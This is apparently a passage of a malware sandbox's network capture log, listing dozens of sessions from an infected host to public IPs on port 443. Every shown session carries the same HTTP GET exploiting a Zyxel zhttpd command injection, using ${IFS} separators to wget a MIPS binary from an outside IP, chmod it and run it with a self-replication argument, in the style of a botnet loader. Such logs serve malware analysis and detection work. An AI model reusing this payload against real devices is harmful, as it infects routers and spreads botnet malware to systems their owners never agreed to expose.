                                                Jan 29, 2024 07:07:54.471817017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5894192.168.2.233340882.84.45.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471828938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5895192.168.2.233749043.241.59.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471852064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5896192.168.2.234208259.110.24.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471923113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5897192.168.2.233567692.254.112.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471951008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5898192.168.2.233687057.58.216.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471981049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5899192.168.2.234090067.212.17.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472028017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5900192.168.2.235391038.178.170.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472053051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5901192.168.2.2357292208.40.7.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472085953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5902192.168.2.2350166143.244.172.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472132921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5903192.168.2.235652832.225.210.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472171068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5904192.168.2.233497684.140.242.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472208977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5905192.168.2.2348640164.60.200.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472249031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5906192.168.2.235423012.39.67.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472282887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5907192.168.2.235430280.86.5.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472316027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5908192.168.2.2343352195.154.12.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472363949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5909192.168.2.2355658159.8.207.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472414017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5910192.168.2.233324039.44.185.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472434044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5911192.168.2.235467250.193.12.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472496033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5912192.168.2.234251065.216.191.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472527027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5913192.168.2.234788643.83.154.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472557068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5914192.168.2.233304886.97.142.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472587109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5915192.168.2.2336202211.224.103.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472645998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5916192.168.2.235836417.108.7.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472661018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5917192.168.2.2345816148.247.67.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472718954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5918192.168.2.2357356103.105.19.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472759008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5919192.168.2.2345520216.111.73.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472830057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5920192.168.2.234467867.104.199.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.472856045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5921192.168.2.235100699.194.128.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473021984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5922192.168.2.2357148158.205.57.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473045111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5923192.168.2.2357072130.103.179.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473069906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5924192.168.2.2357832106.235.126.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473093033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5925192.168.2.2344758206.69.153.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473129034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5926192.168.2.235570425.208.215.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473174095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5927192.168.2.2339012107.158.246.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473217010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5928192.168.2.233451870.224.221.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473241091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5929192.168.2.2336280188.78.203.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473304987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5930192.168.2.2346654119.2.177.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473331928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5931192.168.2.2345028142.40.8.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473361015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5932192.168.2.2351114154.32.17.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473395109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5933192.168.2.2347642206.208.230.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473448992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5934192.168.2.233500614.44.75.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473484039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5935192.168.2.233354232.15.214.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473520041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5936192.168.2.235750051.109.61.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473539114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5937192.168.2.2354162105.215.107.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473608971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5938192.168.2.2348962157.222.21.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473653078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5939192.168.2.2358350104.232.18.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473684072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5940192.168.2.2344274141.242.10.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473742008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5941192.168.2.2336228168.22.55.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473799944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5942192.168.2.2342790148.152.145.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473829985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5943192.168.2.2357874147.77.241.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473882914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5944192.168.2.233978412.161.109.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473923922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5945192.168.2.233810694.250.145.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.473958969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5946192.168.2.2353874160.1.138.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474025965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5947192.168.2.2343784171.112.164.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474041939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5948192.168.2.2355886221.149.121.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474072933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5949192.168.2.235414896.161.200.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474121094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5950192.168.2.2339072223.28.166.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474165916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5951192.168.2.2344890164.241.117.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474199057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5952192.168.2.234094434.99.226.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474237919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5953192.168.2.233392264.145.246.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474281073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5954192.168.2.235563045.162.30.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474299908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5955192.168.2.2351748191.188.28.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474339962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5956192.168.2.2338822222.115.224.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474385977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5957192.168.2.234278875.191.179.2443
                                                TimestampBytes transferredDirectionData
